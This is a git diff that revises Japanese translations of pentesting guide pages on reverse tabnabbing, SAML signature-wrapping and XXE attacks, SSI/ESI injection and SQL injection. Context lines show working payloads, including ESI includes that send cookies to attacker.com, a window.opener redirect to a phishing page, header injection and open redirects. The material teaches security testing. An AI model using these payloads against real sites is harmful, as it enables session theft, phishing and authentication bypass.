-**攻撃者**が**`<a`**タグの**`href`**引数を**制御**できる状況で、属性**`target="_blank" rel="opener"`**を持つリンクが被害者によってクリックされる場合、**攻撃者**はこの**リンク**を自分の制御下にあるウェブサイト（**悪意のある****ウェブサイト**）に向けます。次に、**被害者がリンクをクリック**して攻撃者のウェブサイトにアクセスすると、この**悪意のある****ウェブサイト**はjavascriptオブジェクト**`window.opener`**を介して**元の****ページ**を**制御**できるようになります。\
-ページに**`rel="opener"`**がないが**`target="_blank"`**が含まれていて、**`rel="noopener"`**がない場合も脆弱である可能性があります。
+**攻撃者**が**`<a`**タグの**`href`**引数を**制御**できる状況で、属性**`target="_blank" rel="opener"`**が設定されている場合、被害者がクリックするリンクを、**攻撃者**は自分の制御下にあるウェブサイト（**悪意のある****ウェブサイト**）に**ポイント**します。次に、**被害者がリンクをクリック**して攻撃者のウェブサイトにアクセスすると、この**悪意のある****ウェブサイト**は、javascriptオブジェクト**`window.opener`**を介して**元の****ページ**を**制御**できるようになります。\
+ページに**`rel="opener"`**がないが**`target="_blank"`**が含まれている場合、**`rel="noopener"`**がない場合も脆弱である可能性があります。
 
-この動作を悪用する一般的な方法は、`window.opener.location = https://attacker.com/victim.html`を使用して**元のウェブ**の位置を攻撃者が制御するウェブに**変更**することです。これにより、**元のウェブサイト**の**ログイン****フォーム**を**模倣**し、ユーザーに資格情報を要求することができます。
+この動作を悪用する一般的な方法は、**元のウェブの位置を変更**することです。`window.opener.location = https://attacker.com/victim.html`を使用して、攻撃者が制御する**元のものに似た**ウェブに変更し、元のウェブサイトの**ログイン****フォーム**を**模倣**してユーザーに資格情報を要求することです。
 
-ただし、**攻撃者が元のウェブサイトのウィンドウオブジェクトを制御できるため**、他の方法で**より巧妙な攻撃**を行うことができることに注意してください（もしかしたら、javascriptイベントを変更して彼が制御するサーバーに情報を流出させる？）
+ただし、**攻撃者が元のウェブサイトのウィンドウオブジェクトを制御できるため**、他の方法でそれを悪用して**隠密な攻撃**を行うことができることに注意してください（もしかしたら、javascriptイベントを変更して、彼が制御するサーバーに情報を流出させる？）
 
 # 概要
 
 ## バックリンクあり
 
-防止属性が使用されていない場合の親ページと子ページ間のリンク：
+防止属性が使用されていない場合の親ページと子ページのリンク：
 
 ![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITH_LINK.png)
 
 ## バックリンクなし
 
-防止属性が使用されている場合の親ページと子ページ間のリンク：
+防止属性が使用されている場合の親ページと子ページのリンク：
 
 ![https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png](https://owasp.org/www-community/assets/images/TABNABBING_OVERVIEW_WITHOUT_LINK.png)
 
@@ -58,7 +58,7 @@ window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
 ```
 ## アクセス可能なプロパティ <a href="#accessible-properties" id="accessible-properties"></a>
 
-**クロスオリジン** アクセスが発生するシナリオでは（異なるドメイン間のアクセス）、悪意のあるサイトがアクセスできる **opener** JavaScript オブジェクト参照によって指される **window** JavaScript クラスインスタンスのプロパティは以下のように制限されます：
+**クロスオリジン** アクセスが発生するシナリオでは、悪意のあるサイトがアクセスできる **opener** JavaScript オブジェクト参照によって指される **window** JavaScript クラスインスタンスのプロパティは以下のように制限されます：
 
 - **`opener.closed`**: このプロパティはウィンドウが閉じられたかどうかを判断するためにアクセスされ、ブール値を返します。
 - **`opener.frames`**: このプロパティは現在のウィンドウ内のすべての iframe 要素へのアクセスを提供します。
@@ -68,11 +68,11 @@ window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
 - **`opener.self`**: このプロパティは現在のウィンドウ自体へのアクセスを提供します。
 - **`opener.top`**: このプロパティは最上位のブラウザウィンドウを返します。
 
-ただし、ドメインが同一である場合、悪意のあるサイトは [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript オブジェクト参照によって公開されているすべてのプロパティにアクセスできます。
+ただし、ドメインが同一の場合、悪意のあるサイトは [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript オブジェクト参照によって公開されているすべてのプロパティにアクセスできます。
 
 # 予防
 
-予防情報は [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing) に文書化されています。
+予防に関する情報は [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing) に文書化されています。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md
index 6e20590dd..04ffb8a0f 100644
--- a/src/pentesting-web/saml-attacks/README.md
+++ b/src/pentesting-web/saml-attacks/README.md
@@ -16,7 +16,7 @@ saml-basics.md
 
 ## XMLラウンドトリップ
 
-XMLでは、XMLの署名された部分がメモリに保存され、その後エンコーディング/デコーディングが行われ、署名がチェックされます。理想的には、そのエンコーディング/デコーディングはデータを変更しないはずですが、そのシナリオに基づくと、**チェックされるデータと元のデータは同じでない可能性があります**。
+XMLでは、XMLの署名された部分がメモリに保存され、その後いくつかのエンコーディング/デコーディングが行われ、署名がチェックされます。理想的には、そのエンコーディング/デコーディングはデータを変更するべきではありませんが、そのシナリオに基づくと、**チェックされるデータと元のデータは同じでない可能性があります**。
 
 例えば、次のコードを確認してください:
 ```ruby
@@ -53,63 +53,63 @@ First child after round-trip: Z
 
 ## XML署名ラッピング攻撃
 
-**XML署名ラッピング攻撃（XSW）**では、敵対者はXMLドキュメントが**署名検証**と**関数呼び出し**の2つの異なるフェーズを通過する際に発生する脆弱性を悪用します。これらの攻撃はXMLドキュメントの構造を変更することを含みます。具体的には、攻撃者はXML署名の有効性を損なわない**偽造要素**を**注入**します。この操作は、**アプリケーションロジック**によって分析される要素と、**署名検証モジュール**によってチェックされる要素との間に不一致を生じさせることを目的としています。その結果、XML署名は技術的には有効であり、検証を通過しますが、アプリケーションロジックは**不正な要素**を処理します。したがって、攻撃者はXML署名の**整合性保護**と**起源認証**を効果的に回避し、検出されることなく**任意のコンテンツを注入**することができます。
+**XML署名ラッピング攻撃（XSW）**では、敵対者はXMLドキュメントが**署名検証**と**関数呼び出し**の2つの異なるフェーズを通過する際に発生する脆弱性を悪用します。これらの攻撃はXMLドキュメントの構造を変更することを含みます。具体的には、攻撃者はXML署名の有効性を損なわない**偽造要素**を**注入**します。この操作は、**アプリケーションロジック**によって分析される要素と、**署名検証モジュール**によってチェックされる要素との間に不一致を生じさせることを目的としています。その結果、XML署名は技術的には有効であり、検証を通過しますが、アプリケーションロジックは**不正要素**を処理します。したがって、攻撃者はXML署名の**整合性保護**と**起源認証**を効果的に回避し、検出されることなく**任意のコンテンツを注入**することができます。
 
 以下の攻撃は[**このブログ記事**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **および** [**この論文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)に基づいています。詳細についてはそれらを確認してください。
 
 ### XSW #1
 
-- **戦略**: 署名を含む新しいルート要素が追加されます。
-- **影響**: 検証者は正当な「Response -> Assertion -> Subject」と攻撃者の「悪意のある新しいResponse -> Assertion -> Subject」を混同する可能性があり、データ整合性の問題を引き起こします。
+- **戦略**：署名を含む新しいルート要素が追加されます。
+- **影響**：検証者は正当な「Response -> Assertion -> Subject」と攻撃者の「悪意のある新しいResponse -> Assertion -> Subject」を混同する可能性があり、データ整合性の問題を引き起こします。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../images/image (506).png>)
 
 ### XSW #2
 
-- **XSW #1との違い**: 包含署名の代わりに切り離された署名を利用します。
-- **影響**: XSW #1と同様の「悪意のある」構造は、整合性チェック後にビジネスロジックを欺くことを目的としています。
+- **XSW #1との違い**：包み込み署名の代わりに切り離された署名を利用します。
+- **影響**：「悪意のある」構造は、XSW #1と同様に、整合性チェック後のビジネスロジックを欺くことを目的としています。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../images/image (466).png>)
 
 ### XSW #3
 
-- **戦略**: 元のアサーションと同じ階層レベルで悪意のあるアサーションが作成されます。
-- **影響**: ビジネスロジックを混乱させて悪意のあるデータを使用させることを意図しています。
+- **戦略**：元のアサーションと同じ階層レベルで悪意のあるアサーションが作成されます。
+- **影響**：ビジネスロジックを混乱させて悪意のあるデータを使用させることを意図しています。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../images/image (120).png>)
 
 ### XSW #4
 
-- **XSW #3との違い**: 元のアサーションが複製された（悪意のある）アサーションの子になります。
-- **影響**: XSW #3と似ていますが、XML構造をより攻撃的に変更します。
+- **XSW #3との違い**：元のアサーションが複製された（悪意のある）アサーションの子要素になります。
+- **影響**：XSW #3と似ていますが、XML構造をより攻撃的に変更します。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../images/image (551).png>)
 
 ### XSW #5
 
-- **ユニークな側面**: 署名も元のアサーションも標準構成（包含/包含する/切り離された）に従っていません。
-- **影響**: コピーされたアサーションが署名を包み、期待されるドキュメント構造を変更します。
+- **ユニークな側面**：署名も元のアサーションも標準構成（包み込み/包み込まれた/切り離された）に従っていません。
+- **影響**：コピーされたアサーションが署名を包み込み、期待されるドキュメント構造を変更します。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../images/image (1030).png>)
 
 ### XSW #6
 
-- **戦略**: XSW #4および#5と同様の位置挿入ですが、ひねりがあります。
-- **影響**: コピーされたアサーションが署名を包み、その後元のアサーションを包むことで、入れ子の欺瞞的な構造を作成します。
+- **戦略**：XSW #4および#5と同様の位置挿入ですが、ひねりがあります。
+- **影響**：コピーされたアサーションが署名を包み込み、その後元のアサーションを包み込むことで、入れ子の欺瞞的な構造を作成します。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../images/image (169).png>)
 
 ### XSW #7
 
-- **戦略**: コピーされたアサーションを子として持つExtensions要素が挿入されます。
-- **影響**: Extensions要素の制約が少ないスキーマを利用して、特にOpenSAMLのようなライブラリでスキーマ検証対策を回避します。
+- **戦略**：コピーされたアサーションを子要素として持つExtensions要素が挿入されます。
+- **影響**：Extensions要素の制約が少ないスキーマを利用して、特にOpenSAMLのようなライブラリでスキーマ検証対策を回避します。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../images/image (971).png>)
 
 ### XSW #8
 
-- **XSW #7との違い**: 攻撃のバリエーションのために別の制約の少ないXML要素を利用します。
-- **影響**: 元のアサーションが制約の少ない要素の子になり、XSW #7で使用された構造を逆転させます。
+- **XSW #7との違い**：攻撃のバリエーションのために別の制約の少ないXML要素を利用します。
+- **影響**：元のアサーションが制約の少ない要素の子要素になり、XSW #7で使用された構造を逆転させます。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../images/image (541).png>)
 
@@ -125,7 +125,7 @@ XXE攻撃がどのようなものか知らない場合は、以下のページ
 ../xxe-xee-xml-external-entity.md
 {{#endref}}
 
-SAMLレスポンスは**圧縮され、base64エンコードされたXMLドキュメント**であり、XML外部エンティティ（XXE）攻撃に対して脆弱である可能性があります。SAMLレスポンスのXML構造を操作することで、攻撃者はXXEの脆弱性を悪用しようとすることができます。このような攻撃がどのように視覚化されるかは次のとおりです：
+SAMLレスポンスは**デフレートされ、base64エンコードされたXMLドキュメント**であり、XML外部エンティティ（XXE）攻撃に対して脆弱である可能性があります。SAMLレスポンスのXML構造を操作することで、攻撃者はXXE脆弱性を悪用しようとすることができます。このような攻撃がどのように視覚化されるかは次のとおりです：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [
@@ -181,7 +181,7 @@ XSLTに関する詳細情報は、以下にアクセスしてください:
 ```
 ### ツール
 
-Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用して、SAMLリクエストからPOCを生成し、XSLTの脆弱性をテストできます。
+Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用して、SAMLリクエストからPOCを生成し、XSLTの脆弱性をテストすることもできます。
 
 このトークもチェックしてください: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
 
@@ -193,7 +193,7 @@ Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb1
 
 ### ツール <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
 
-Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用できます。SAMLレスポンスを傍受し、`Remove Signatures`をクリックします。これにより、**すべての**署名要素が削除されます。
+Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用することもできます。SAMLレスポンスを傍受し、`Remove Signatures`をクリックします。これにより、**すべての**署名要素が削除されます。
 
 署名が削除された状態で、リクエストをターゲットに進めます。サービスによって署名が必要ない場合
 
@@ -201,23 +201,23 @@ Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb1
 
 ## 証明書の偽造
 
-証明書の偽造は、**サービスプロバイダー（SP）がSAMLメッセージが信頼されたアイデンティティプロバイダー（IdP）によって署名されていることを適切に検証するかどうかをテストする技術**です。これは、SAMLレスポンスまたはアサーションに対して\***自己署名証明書**を使用して署名することを含み、SPとIdP間の信頼検証プロセスを評価するのに役立ちます。
+証明書の偽造は、**サービスプロバイダー（SP）がSAMLメッセージが信頼されたアイデンティティプロバイダー（IdP）によって署名されていることを適切に検証するかどうかをテストする技術**です。これは、SAMLレスポンスまたはアサーションに\***自己署名証明書**を使用して署名することを含み、SPとIdP間の信頼検証プロセスを評価するのに役立ちます。
 
 ### 証明書の偽造を実施する方法
 
-以下の手順は、[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp拡張機能を使用したプロセスを概説します：
+以下の手順は、[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp拡張機能を使用したプロセスを概説しています：
 
 1. SAMLレスポンスを傍受します。
 2. レスポンスに署名が含まれている場合、`Send Certificate to SAML Raider Certs`ボタンを使用して証明書をSAML Raider Certsに送信します。
 3. SAML Raiderの証明書タブで、インポートした証明書を選択し、`Save and Self-Sign`をクリックして元の証明書の自己署名クローンを作成します。
 4. Burpのプロキシで傍受したリクエストに戻ります。XML署名のドロップダウンから新しい自己署名証明書を選択します。
-5. `Remove Signatures`ボタンを使用して既存の署名を削除します。
-6. 適切に**`(Re-)Sign Message`**または**`(Re-)Sign Assertion`**ボタンを使用して、新しい証明書でメッセージまたはアサーションに署名します。
+5. `Remove Signatures`ボタンで既存の署名を削除します。
+6. **`(Re-)Sign Message`**または**`(Re-)Sign Assertion`**ボタンを使用して、新しい証明書でメッセージまたはアサーションに署名します。
 7. 署名されたメッセージを転送します。成功した認証は、SPが自己署名証明書で署名されたメッセージを受け入れることを示し、SAMLメッセージの検証プロセスに潜在的な脆弱性があることを明らかにします。
 
 ## トークン受信者の混乱 / サービスプロバイダーターゲットの混乱 <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
 
-トークン受信者の混乱とサービスプロバイダーターゲットの混乱は、**サービスプロバイダーが応答の意図された受信者を正しく検証するかどうかを確認すること**を含みます。基本的に、サービスプロバイダーは、異なるプロバイダー向けの認証応答を拒否する必要があります。ここでの重要な要素は、SAMLレスポンスの**SubjectConfirmationData**要素内にある**Recipient**フィールドです。このフィールドは、アサーションが送信されるべきURLを指定します。実際の受信者が意図されたサービスプロバイダーと一致しない場合、アサーションは無効と見なされるべきです。
+トークン受信者の混乱とサービスプロバイダーターゲットの混乱は、**サービスプロバイダーがレスポンスの意図された受信者を正しく検証するかどうかを確認すること**を含みます。基本的に、サービスプロバイダーは、異なるプロバイダー向けの認証レスポンスを拒否する必要があります。ここでの重要な要素は、SAMLレスポンスの**SubjectConfirmationData**要素内にある**Recipient**フィールドです。このフィールドは、アサーションが送信されるべきURLを指定します。実際の受信者が意図されたサービスプロバイダーと一致しない場合、アサーションは無効と見なされるべきです。
 
 #### **動作の仕組み**
 
@@ -256,13 +256,13 @@ https://carbon-prototype.uberinternal.com:443/oidauth/logout
 ```
 https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
 ```
-これは、`base`パラメータがURLを受け入れることを明らかにしました。これを考慮して、XSS（クロスサイトスクリプティング）攻撃を開始する試みとして、URLを`javascript:alert(123);`に置き換えるアイデアが浮かびました。
+このことから、`base` パラメータが URL を受け入れることが明らかになりました。これを考慮して、XSS (クロスサイトスクリプティング) 攻撃を開始する試みとして、URL を `javascript:alert(123);` に置き換えるアイデアが浮かびました。
 
 ### 大規模な悪用
 
-[この研究から](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/):
+[この研究から](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)：
 
-[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor)ツールを使用して、同じライブラリを利用している`uberinternal.com`のサブドメインを分析しました。その後、`oidauth/prompt`ページをターゲットにするスクリプトが開発されました。このスクリプトは、データを入力して出力に反映されるかどうかを確認することでXSS（クロスサイトスクリプティング）をテストします。入力が実際に反映される場合、スクリプトはそのページを脆弱であるとフラグ付けします。
+[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) ツールを使用して、同じライブラリを利用している `uberinternal.com` のサブドメインを分析しました。その後、`oidauth/prompt` ページをターゲットにしたスクリプトが開発されました。このスクリプトは、データを入力して出力に反映されるかどうかを確認することで XSS (クロスサイトスクリプティング) をテストします。入力が実際に反映される場合、スクリプトはそのページを脆弱であるとフラグ付けします。
 ```python
 import requests
 import urllib3
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index c0c37754c..24656338a 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -13,7 +13,7 @@
 
 **詳細については、[https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/) の完全な投稿を確認してください**。これは要約です：
 
-SAML 認証プロセスは、スキーマに示されているように、いくつかのステップを含みます：
+SAML 認証プロセスは、以下のステップを含みます。
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg](https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg)
 
@@ -49,14 +49,14 @@ Host: shibdemo-sp1.test.edu
 - **ProtocolBinding**: SAMLプロトコルメッセージの送信方法を定義します。
 - **saml:Issuer**: リクエストを開始したエンティティを識別します。
 
-SAMLリクエストの生成に続いて、SPは**302リダイレクト**で応答し、ブラウザをSAMLリクエストがHTTPレスポンスの**Location**ヘッダーにエンコードされているIdPに向けます。**RelayState**パラメータはトランザクション全体で状態情報を保持し、SPがSAMLレスポンスを受け取った際に初期リソースリクエストを認識できるようにします。**SAMLRequest**パラメータは、生のXMLスニペットの圧縮およびエンコードされたバージョンで、Deflate圧縮とbase64エンコーディングを利用しています。
+SAMLリクエストの生成に続いて、SPは**302リダイレクト**で応答し、ブラウザをIdPに向けてSAMLリクエストをHTTPレスポンスの**Location**ヘッダーにエンコードして送信します。**RelayState**パラメータはトランザクション全体で状態情報を保持し、SPがSAMLレスポンスを受信した際に初期リソースリクエストを認識できるようにします。**SAMLRequest**パラメータは、生のXMLスニペットの圧縮およびエンコードされたバージョンで、Deflate圧縮とbase64エンコーディングを利用しています。
 
 # SAMLレスポンスの例
 
 [こちらに完全なSAMLレスポンスがあります](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)。レスポンスの主要なコンポーネントは次のとおりです：
 
 - **ds:Signature**: このセクションはXML署名で、アサーションの発行者の整合性と真正性を保証します。例のSAMLレスポンスには、メッセージ用とアサーション用の2つの`ds:Signature`要素が含まれています。
-- **saml:Assertion**: この部分はユーザーのアイデンティティに関する情報や他の属性を保持します。
+- **saml:Assertion**: この部分はユーザーのアイデンティティやその他の属性に関する情報を保持します。
 - **saml:Subject**: アサーション内のすべてのステートメントの主要な主体を指定します。
 - **saml:StatusCode**: 対応するリクエストに対する操作のステータスを表します。
 - **saml:Conditions**: アサーションの有効性のタイミングや指定されたサービスプロバイダーなどの条件を詳細に説明します。
@@ -65,11 +65,11 @@ SAMLリクエストの生成に続いて、SPは**302リダイレクト**で応
 
 SAMLレスポンスに続いて、プロセスにはIdPからの302リダイレクトが含まれます。これにより、サービスプロバイダーのアサーションコンシューマサービス（ACS）URLへのPOSTリクエストが行われます。POSTリクエストには`RelayState`および`SAMLResponse`パラメータが含まれます。ACSはSAMLレスポンスの処理と検証を担当します。
 
-POSTリクエストが受信され、SAMLレスポンスが検証されると、ユーザーが最初にリクエストした保護されたリソースへのアクセスが許可されます。これは`/secure/`エンドポイントへの`GET`リクエストと、リソースへの成功したアクセスを示す`200 OK`レスポンスで示されます。
+POSTリクエストが受信され、SAMLレスポンスが検証されると、ユーザーが最初にリクエストした保護されたリソースへのアクセスが許可されます。これは`GET`リクエストを`/secure/`エンドポイントに送り、リソースへの成功したアクセスを示す`200 OK`レスポンスで示されます。
 
 # XML署名
 
-XML署名は多用途で、XMLツリー全体またはその中の特定の要素に署名できます。レスポンス要素だけでなく、任意のXMLオブジェクトに適用できます。以下はXML署名の主要なタイプです：
+XML署名は多用途で、XMLツリー全体またはその中の特定の要素に署名することができます。レスポンス要素だけでなく、任意のXMLオブジェクトに適用できます。以下はXML署名の主要なタイプです：
 
 ### XML署名の基本構造
 
@@ -91,7 +91,7 @@ XML署名は、次のような基本要素で構成されています：
 <Object />
 </Signature>
 ```
-各 `Reference` 要素は、URI 属性によって識別される特定のリソースが署名されていることを示します。
+各 `Reference` 要素は、URI 属性によって識別可能な、署名される特定のリソースを示します。
 
 ### XML 署名の種類
 
diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index fa49d8431..909092318 100644
--- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -6,7 +6,7 @@
 
 **(紹介は** [**Apache docs**](https://httpd.apache.org/docs/current/howto/ssi.html)**からのものです)**
 
-SSI (Server Side Includes) は、**HTMLページに配置され、ページが提供される際にサーバーで評価される指示文**です。これにより、**既存のHTMLページに動的に生成されたコンテンツを追加**することができ、CGIプログラムや他の動的技術を介してページ全体を提供する必要がありません。\
+SSI (Server Side Includes) は、**HTMLページに配置され、ページが提供される際にサーバー上で評価される指示文**です。これにより、**既存のHTMLページに動的に生成されたコンテンツを追加**することができ、CGIプログラムや他の動的技術を介してページ全体を提供する必要がありません。\
 例えば、既存のHTMLページに次のような指示文を配置することができます：
 
 `<!--#echo var="DATE_LOCAL" -->`
@@ -17,9 +17,9 @@ SSI (Server Side Includes) は、**HTMLページに配置され、ページが
 
 SSIを使用するタイミングと、ページ全体をプログラムによって生成するタイミングの決定は、通常、ページのどの部分が静的で、どの部分がページが提供されるたびに再計算される必要があるかの問題です。SSIは、上記のように現在の時刻などの小さな情報を追加するのに最適な方法です。しかし、ページの大部分が提供される際に生成される場合は、他の解決策を探す必要があります。
 
-ウェブアプリケーションが拡張子&#x73;**`.shtml`, `.shtm` または `.stm`**のファイルを使用している場合、SSIの存在を推測できますが、それだけではありません。
+ウェブアプリケーションが拡張子が**`.shtml`、`.shtm`、または`.stm`**のファイルを使用している場合、SSIの存在を推測できますが、それだけではありません。
 
-典型的なSSI式は次の形式を持っています：
+典型的なSSI表現は次の形式を持っています：
 ```
 <!--#directive param="value" -->
 ```
@@ -56,7 +56,7 @@ SSIを使用するタイミングと、ページ全体をプログラムによ
 ```
 ## Edge Side Inclusion
 
-情報や動的アプリケーションを**キャッシュする**ことに問題があります。コンテンツの一部は、次回コンテンツが取得される際に**異なる**可能性があります。これが**ESI**が使用される理由であり、ESIタグを使用して**生成する必要がある動的コンテンツ**を示します。\
+情報や動的アプリケーションを**キャッシュする**ことには問題があります。コンテンツの一部は次回コンテンツが取得される際に**異なる**可能性があります。これが**ESI**が使用される理由であり、ESIタグを使用して**生成する必要がある動的コンテンツ**を示します。\
 もし**攻撃者**がキャッシュコンテンツ内に**ESIタグを注入**できれば、ユーザーに送信される前に文書に**任意のコンテンツを注入**できる可能性があります。
 
 ### ESI Detection
@@ -65,8 +65,8 @@ SSIを使用するタイミングと、ページ全体をプログラムによ
 ```
 Surrogate-Control: content="ESI/1.0"
 ```
-このヘッダーが見つからない場合、サーバーは**それでもESIを使用している可能性があります**。\
-**盲目的なエクスプロイトアプローチも使用できます**。リクエストは攻撃者のサーバーに到達する必要があります：
+このヘッダーが見つからない場合、サーバーは**ESIを使用している可能性があります**。\
+**盲目的なエクスプロイト手法も使用できます**。リクエストは攻撃者のサーバーに到達する必要があります：
 ```javascript
 // Basic detection
 hell<!--esi-->o
@@ -95,7 +95,7 @@ hell<!--esi-->o
 - **Vars**: `<esi:vars>`ディレクティブをサポート。XSSフィルターをバイパスするのに便利
 - **Cookie**: ドキュメントクッキーはESIエンジンにアクセス可能
 - **Upstream Headers Required**: 上流アプリケーションがヘッダーを提供しない限り、サロゲートアプリケーションはESIステートメントを処理しない
-- **Host Allowlist**: この場合、ESIのインクルードは許可されたサーバーホストからのみ可能であり、例えばSSRFはこれらのホストに対してのみ可能
+- **Host Allowlist**: この場合、ESIインクルードは許可されたサーバーホストからのみ可能であり、例えばSSRFはこれらのホストに対してのみ可能
 
 |         **ソフトウェア**         | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** |
 | :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: |
@@ -127,7 +127,7 @@ Use <!--esi--> to bypass WAFs:
 <esi:include src=http://attacker.com/$(HTTP_COOKIE)>
 <esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
 ```
-- XSSを使用してHTTP_ONLYクッキーを盗むには、それをレスポンスに反映させます:
+- XSSを使用してHTTP_ONLYクッキーを応答に反映させて盗む:
 ```bash
 # This will reflect the cookies in the response
 <!--esi $(HTTP_COOKIE) -->
@@ -146,9 +146,9 @@ Use <!--esi--> to bypass WAFs:
 ```markup
 <esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
 ```
-#### オープンリダイレクト
+#### Open Redirect
 
-次の内容は、レスポンスに `Location` ヘッダーを追加します。
+以下は、レスポンスに `Location` ヘッダーを追加します。
 ```bash
 <!--esi $add_header('Location','http://attacker.com') -->
 ```
@@ -160,7 +160,7 @@ Use <!--esi--> to bypass WAFs:
 <esi:request_header name="User-Agent" value="12345"/>
 </esi:include>
 ```
-- レスポンスにヘッダーを追加する（XSSを使用して"Content-Type: text/json"をバイパスするのに役立ちます）
+- レスポンスにヘッダーを追加する（XSSを使用して「Content-Type: text/json」をバイパスするのに役立ちます）
 ```bash
 <!--esi/$add_header('Content-Type','text/html')/-->
 
@@ -183,7 +183,7 @@ Host: anotherhost.com"/>
 ```
 ### ESI + XSLT = XXE
 
-**`eXtensible Stylesheet Language Transformations (XSLT)`** の構文を ESI で使用することが可能で、単にパラメータ **`dca`** の値を **`xslt`** と指定するだけです。これにより、**XSLT** を悪用して XML 外部エンティティ脆弱性 (XXE) を作成および悪用することができるかもしれません：
+ESIで**`eXtensible Stylesheet Language Transformations (XSLT)`**構文を使用することが可能で、単にパラメータ**`dca`**の値を**`xslt`**として指定するだけです。これにより、**XSLT**を悪用してXML外部エンティティ脆弱性（XXE）を作成および悪用することができるかもしれません：
 ```xml
 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
 ```
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 33f38e4b6..0730c8d2a 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -5,7 +5,7 @@
 
 ## SQLインジェクションとは？
 
-**SQLインジェクション**は、攻撃者がアプリケーションのデータベースクエリに**干渉する**ことを可能にするセキュリティの欠陥です。この脆弱性により、攻撃者は**見る**、**変更する**、または**削除する**ことができるデータにアクセスできるようになり、他のユーザーの情報やアプリケーションがアクセスできる任意のデータを含みます。このような行動は、アプリケーションの機能やコンテンツに永続的な変更をもたらしたり、サーバーの侵害やサービス拒否を引き起こす可能性があります。
+**SQLインジェクション**は、攻撃者がアプリケーションの**データベースクエリに干渉する**ことを可能にするセキュリティの欠陥です。この脆弱性により、攻撃者は**見る**、**変更する**、または**削除する**ことができるデータにアクセスできるようになり、他のユーザーの情報やアプリケーションがアクセスできる任意のデータを含みます。このような行動は、アプリケーションの機能やコンテンツに永続的な変更をもたらしたり、サーバーの侵害やサービス拒否を引き起こす可能性があります。
 
 ## エントリーポイントの検出
 
@@ -22,7 +22,7 @@
 "))
 `))
 ```
-次に、**エラーが出ないようにクエリを修正する方法**を知っておく必要があります。クエリを修正するためには、**データを入力して**、**前のクエリが新しいデータを受け入れる**ようにするか、単に**データを入力して**、**最後にコメント記号を追加**することができます。
